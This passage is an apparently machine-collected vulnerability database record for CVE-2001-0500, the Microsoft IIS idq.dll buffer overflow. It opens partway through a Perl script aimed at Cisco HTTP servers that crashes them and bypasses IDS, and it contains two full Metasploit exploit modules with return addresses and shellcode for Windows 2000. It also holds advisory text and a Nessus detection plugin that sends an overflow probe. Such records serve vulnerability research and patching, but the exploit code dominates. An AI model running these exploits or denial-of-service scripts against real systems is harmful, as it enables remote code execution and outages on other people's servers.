PeerAddr=>$serv,\r\n PeerPort=>\"http(80)\",);\r\n unless ($sockd2){die \"Vulnerability successful exploited. Target server is down ...\\n\\n\"};\r\n\r\n print \"Target is not vulnerable. Server is still up after 5 kb of buffer ...)\\n\";\r\n close($sockd2);\r\n exit(1);\r\n}\r\n\r\nsub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF)\r\n{\r\n my $serv = $host;\r\n my $vuln = \"GET %u002F HTTP/1.0\\n\\n\";\r\n\r\n my $sockd = IO::Socket::INET->new (\r\n PeerAddr => $serv,\r\n PeerPort => \"(80)\",\r\n Proto => \"tcp\")\r\n || die \"No http server detected on $serv ...\\n\\n\";\r\n\r\n print \"Packet sent ...\\n\";\r\n print $sockd \"$vuln\";\r\n close($sockd);\r\n sleep(1);\r\n print(\"Now checking server's status ...\\n\");\r\n print(\"Please verify if directory has been listed ...\\n\\n\");\r\n print(\"Server response :\\n\");\r\n sleep(2);\r\n while (<$sockd>){ print }\r\n exit(1);\r\n}\r\n\r\nsub cisco14 # Cisco IOS HTTP server DoS Vulnerability\r\n{\r\n my $serv = $host;\r\n my $vuln = \"GET /TEST?/ HTTP/1.0\";\r\n\r\n my $sockd = IO::Socket::INET->new (\r\n Proto=>\"tcp\",\r\n PeerAddr=>$serv,\r\n PeerPort=>\"http(80)\",);\r\n unless ($sockd){die \"No http server detected on $serv ...\\n\\n\"};\r\n\r\n print $sockd \"$vuln\\n\\n\";\r\n print \"Packet sent ...\\n\";\r\n close($sockd);\r\n sleep(1);\r\n print(\"Now checking server's status ...\\n\");\r\n sleep(2);\r\n\r\n my $sockd2 = IO::Socket::INET->new (\r\n Proto=>\"tcp\",\r\n PeerAddr=>$serv,\r\n PeerPort=>\"http(80)\",);\r\n unless ($sockd2){die \"Vulnerability successful exploited. Target server is down ...\\n\\n\"};\r\n\r\n print(\"Vulnerability unsuccessful exploited. Target server is still up ...\\n\\n\");\r\n close($sockd2);\r\n exit(1);\r\n}\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20933/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-2001-0500"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Microsoft IIS. The 'idq.dll' library fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long argument to Internet Data Administration (.ida) and Internet Data Query (.idq) files, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.\n## Short Description\nA remote overflow exists in Microsoft IIS. The 'idq.dll' library fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long argument to Internet Data Administration (.ida) and Internet Data Query (.idq) files, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.microsoft.com/\nOther Advisory URL: http://www.eeye.com/html/research/advisories/AD20010618.html\n[Nessus Plugin ID:10695](https://vulners.com/search?query=pluginID:10695)\n[Nessus Plugin ID:10713](https://vulners.com/search?query=pluginID:10713)\nMicrosoft Security Bulletin: MS01-033\nKeyword: Code Red\nKeyword: IDQ\nISS X-Force ID: 6705\nGeneric Informational URL: http://oval.mitre.org/oval/definitions/pseudo/OVAL197.html\n[CVE-2001-0500](https://vulners.com/cve/CVE-2001-0500)\nCIAC Advisory: l-098\nCERT: CA-2001-13\nBugtraq ID: 2880\n", "modified": "2001-06-18T00:00:00", "published": "2001-06-18T00:00:00", "id": "OSVDB:568", "href": "https://vulners.com/osvdb/OSVDB:568", "title": "Microsoft IIS idq.dll IDA/IDQ ISAPI Remote Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:26", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Microsoft IIS 5.0 IDQ Path Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0500"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:82956", "href": "https://packetstormsecurity.com/files/82956/Microsoft-IIS-5.0-IDQ-Path-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft IIS 5.0 IDQ Path Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in the IDQ ISAPI handler for \nMicrosoft Index Server. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2001-0500'], \n[ 'OSVDB', '568'], \n[ 'MSB', 'MS01-033'], \n[ 'BID', '2880'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 800, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\", \n'StackAdjustment' => -3500, \n}, \n \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 2000 Pro English SP0', { 'Ret' => '0x6e8f3e24' } ], \n[ 'Windows 2000 Pro English SP1-SP2', { 'Ret' => '0x6e8f8cc4' } ], \n], \n'DisclosureDate' => 'June 18 2001', \n'DefaultTarget' => 0)) \n \nregister_options([Opt::RPORT(80)], self.class) \n \nend \n \ndef exploit \nconnect \n \nsploit = rand_text_alphanumeric(1) + \".idq?\" + rand_text_alphanumeric(232) \nsploit << \"%u06eb.%u\" + target.ret[-4, 4] + \"%u\" + target.ret[-8, 4] \nsploit << \".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=\" \nsploit << rand_text_alphanumeric(1) + \" HTTP/1.0\\r\\n\\r\\n\" + rand_text_alphanumeric(46) \n \nuri = '/' + sploit + payload.encoded \n \nres = \"GET #{uri}\\r\\n\\r\\n\" \n \nprint_status(\"Trying target #{target.name}...\") \n \nsock.put(res) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82956/ms01_033_idq.rb.txt"}], "metasploit": [{"lastseen": "2020-05-22T06:18:09", "description": "This module exploits a stack buffer overflow in the IDQ ISAPI handler for Microsoft Index Server.\n", "published": "2006-09-13T06:20:05", "type": "metasploit", "title": "MS01-033 Microsoft IIS 5.0 IDQ Path Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0500"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/IIS/MS01_033_IDQ", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS01-033 Microsoft IIS 5.0 IDQ Path Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the IDQ ISAPI handler for\n Microsoft Index Server.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2001-0500'],\n [ 'OSVDB', '568'],\n [ 'MSB', 'MS01-033'],\n [ 'BID', '2880'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\n 'StackAdjustment' => -3500,\n },\n\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 2000 Pro English SP0', { 'Ret' => '0x6e8f3e24' } ],\n [ 'Windows 2000 Pro English SP1-SP2', { 'Ret' => '0x6e8f8cc4' } ],\n ],\n 'DisclosureDate' => 'Jun 18 2001',\n 'DefaultTarget' => 0))\n\n register_options([Opt::RPORT(80)])\n end\n\n def exploit\n connect\n\n sploit = rand_text_alphanumeric(1) + \".idq?\" + rand_text_alphanumeric(232)\n sploit << \"%u06eb.%u\" + target.ret[-4, 4] + \"%u\" + target.ret[-8, 4]\n sploit << \".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=\"\n sploit << rand_text_alphanumeric(1) + \" HTTP/1.0\\r\\n\\r\\n\" + rand_text_alphanumeric(46)\n\n uri = '/' + sploit + payload.encoded\n\n res = \"GET #{uri}\\r\\n\\r\\n\"\n\n print_status(\"Trying target #{target.name}...\")\n\n sock.put(res)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/iis/ms01_033_idq.rb"}], "canvas": [{"lastseen": "2019-05-29T17:19:28", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0500"], "description": "**Name**| ms01_033 \n---|--- \n**CVE**| CVE-2001-0500 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| IIS 5.0 Index Server ISAPI (.ida) Overflow \n**Notes**| CVE Name: CVE-2001-0500 \nVENDOR: Microsoft \nMSADV: MS01-033 \nVersionsAffected: \nRepeatability: \nReferences: http://www.microsoft.com/technet/security/bulletin/MS01-033.mspx \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0500 \nDate public: 06/18/01 \nCVSS: 10.0 \n\n", "edition": 2, "modified": "2001-07-21T04:00:00", "published": "2001-07-21T04:00:00", "id": "MS01_033", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms01_033", "title": "Immunity Canvas: MS01_033", "type": "canvas", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T03:16:33", "description": "There's a buffer overflow in the remote web server through\nthe ISAPI filter.\n \nIt is possible to overflow the remote web server and execute \ncommands as user SYSTEM.\n\nAdditionally, other vulnerabilities exist in the remote web\nserver since it has not been patched.", "edition": 27, "published": "2001-06-19T00:00:00", "title": "Microsoft IIS ISAPI Filter Multiple Vulnerabilities (MS01-044)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0500", "CVE-2001-0506", "CVE-2001-0544", "CVE-2001-0507", "CVE-2001-0545", "CVE-2001-0508"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:microsoft:iis"], "id": "IIS_ISAPI_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/10685", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# This script was written by Renaud Deraison <deraison@cvs.nessus.org>\n# It was modified by H D Moore to not crash the server during the test\n#\n# Supercedes MS01-033\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(10685);\n script_version (\"1.51\");\n script_cve_id( \"CVE-2001-0544\", \"CVE-2001-0545\", \"CVE-2001-0506\", \"CVE-2001-0507\", \"CVE-2001-0508\", \"CVE-2001-0500\");\n script_bugtraq_id(2690, 2880, 3190, 3193, 3194, 3195);\n script_xref(name:\"MSFT\", value:\"MS01-033\");\n script_xref(name:\"MSFT\", value:\"MS01-044\");\n script_xref(name:\"MSKB\", value:\"294774\");\n script_xref(name:\"MSKB\", value:\"297860\");\n script_xref(name:\"MSKB\", value:\"298340\");\n script_xref(name:\"MSKB\", value:\"300972\");\n script_xref(name:\"MSKB\", value:\"301625\");\n script_xref(name:\"MSKB\", value:\"304867\");\n script_xref(name:\"MSKB\", value:\"305359\");\n\n script_name(english:\"Microsoft IIS ISAPI Filter Multiple Vulnerabilities (MS01-044)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"There's a buffer overflow in the remote web server through\nthe ISAPI filter.\n \nIt is possible to overflow the remote web server and execute \ncommands as user SYSTEM.\n\nAdditionally, other vulnerabilities exist in the remote web\nserver since it has not been patched.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-033\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-044\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the patches from the bulletins above.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS01-033 Microsoft IIS 5.0 IDQ Path Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2001/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2001/06/18\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2001/05/06\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:iis\");\nscript_end_attributes();\n\n\n script_summary(english:\"Tests for a remote buffer overflow in IIS\");\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.\");\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\", \"www_fingerprinting_hmap.nasl\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n# The attack starts here\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nb = get_http_banner(port: port);\nif (\"IIS\" >!< h ) exit(0);\n \n \nw = http_send_recv3(method: \"GET\", port: port,\n item: \"/x.ida?\"+crap(length:220, data:\"x\")+\"=x\");\nif (isnull(w)) exit(1, \"the web server did not answer\");\nr = strcat(w[0], w[1], '\\r\\n', w[2]);\n\n # 0xc0000005 == \"Access Violation\"\n if (\"0xc0000005\" >< r)\n {\n security_hole(port);\n }\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}